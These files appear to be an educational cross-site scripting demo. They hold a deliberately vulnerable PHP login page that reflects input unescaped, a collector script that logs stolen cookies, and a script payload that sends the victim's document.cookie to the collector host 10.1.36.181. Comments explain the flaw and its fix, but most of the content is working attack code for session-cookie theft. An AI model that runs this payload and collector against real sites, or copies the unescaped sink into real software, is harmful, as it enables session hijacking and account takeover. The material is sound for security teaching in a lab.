<?php
// victim.php -- the deliberately vulnerable target of this cookie-stealing demo.
// It must NOT be deployed anywhere reachable: every statement below is the lesson.
session_start();
// A fresh session id is issued on *every* request, not just at login. For the
// demo this matters: the id captured by the injected payload is the one shown
// on the page at that moment, and the victim's next request to this page
// rotates it again. delete_old_session is left at its default (false in PHP),
// so whether the previously issued id still resolves to a live session -- and
// therefore how long a captured id stays usable -- depends on your session
// handler; verify on your own setup rather than assuming either way.
session_regenerate_id();
// Printing the session id into the response is an information disclosure in
// its own right; it is here only so the exfiltrated value can be compared with
// what the page displayed.
echo session_id()."<br/>";
// Reflected XSS sink: $_POST["name"] is written into the HTML unescaped, so a
// submitted <script> tag runs in this page's origin with access to its cookies.
// The fix -- deliberately NOT applied here -- is
//   htmlspecialchars($_POST["name"], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
// Note the sink only fires on a POST carrying "login" (the form below), so
// delivering the payload to a third party requires them to submit such a
// request, e.g. via an attacker-hosted auto-submitting form (presumed; the
// delivery step is not shown on this page).
if(isset($_POST["login"])) { echo "Hello " .$_POST["name"]."<br/>"; } ?>
<html> <body> <form id ="form1" name="form1" method="post" action="victim.php"> <label>Name <input name="name" type="text" id="name"/> </label> <input name="login" type="submit" id="login" value="submit"/> </form> </body> </html>
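<?php
declare(strict_types=1);

// stealcookies.php -- collector endpoint for the XSS demo.
//
// Prerequisite (from the original page): a file named cookie.txt that the web
// server user can write to must exist in the same directory as this script.
//
// Every hit appends one line to cookie.txt with the client IP, User-Agent,
// request method, Referer, a timestamp and the raw query string. The
// exfiltrated document.cookie arrives in that query string as the "a="
// parameter of the <img> request the injected payload makes.
//
// NOTE(review): cookie.txt lives inside the web root next to this script, so
// everything logged here is itself retrievable over HTTP by anyone who guesses
// the name. For anything beyond a throwaway lab, move the log outside the
// document root or deny web access to it. The filename is kept as-is because
// the page's "cat cookie.txt" step depends on it.

// User-Agent and Referer are optional request headers; the original read them
// unconditionally, which raises "Undefined array key" warnings on PHP 8 and
// can leak notices into the response.
$ua          = $_SERVER["HTTP_USER_AGENT"] ?? "";
$client_ip   = $_SERVER["REMOTE_ADDR"] ?? "";
$method      = $_SERVER["REQUEST_METHOD"] ?? "";
$referer     = $_SERVER["HTTP_REFERER"] ?? "";
$date        = date("F j, Y, g:i a");
$querystring = $_SERVER["QUERY_STRING"] ?? "";

// Every field except the timestamp is client-controlled. Strip CR/LF so a
// single request cannot forge additional log lines; the line format itself
// is unchanged from the original so existing parsing of cookie.txt still works.
$fields = str_replace(
    ["\r", "\n"],
    " ",
    [$client_ip, $ua, $method, $referer, $date, $querystring]
);
$str = vsprintf(
    "IP: %s |Useragent: %s | Method: %s | REF: %s | Date: %s | Cookie: %s \n",
    $fields
);

// Append under an exclusive lock so concurrent hits do not interleave. The
// original fopen("a+")/fwrite pair never checked the open result; on PHP 8
// fwrite(false, ...) is a TypeError, and before that the entry was silently
// lost. The <img> fetch ignores the response body, so report to the server
// error log instead of the browser.
if (file_put_contents("cookie.txt", $str, FILE_APPEND | LOCK_EX) === false) {
    error_log("stealcookies.php: cannot append to cookie.txt");
}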
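<!-- Exfiltration payload for the demo. Submitted as the "name" field of
     victim.php, it is reflected unescaped into the page and makes the
     victim's browser fetch the collector with its own cookies in the query
     string. 10.1.36.181 is the collector host from this page -- replace it
     with the host serving your stealcookies.php. It is wrapped here for
     reading; a text input strips newlines, so the comments below are block
     comments and the statement stays valid when collapsed onto one line. -->
<script>
/* encodeURIComponent, not encodeURI: encodeURI leaves ; = & + # and / alone,
   so a cookie value containing & would be split into a second parameter and
   one containing # would truncate the URL before it reached the server. The
   collector logs the raw query string, so the value arrives URL-encoded. */
/* Cookies flagged HttpOnly are not visible to document.cookie at all; this
   only captures PHP's session cookie while it is issued without that flag. */
document.write('<img src="http://10.1.36.181/stealcookies.php?a=' + encodeURIComponent(document.cookie) + '"/>');
</script>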
# Show the collector's log (run from the directory holding stealcookies.php).
# Each line is one captured request; the exfiltrated cookie is the trailing
# "Cookie:" field, still URL-encoded exactly as it arrived in the query string.
cat -- cookie.txt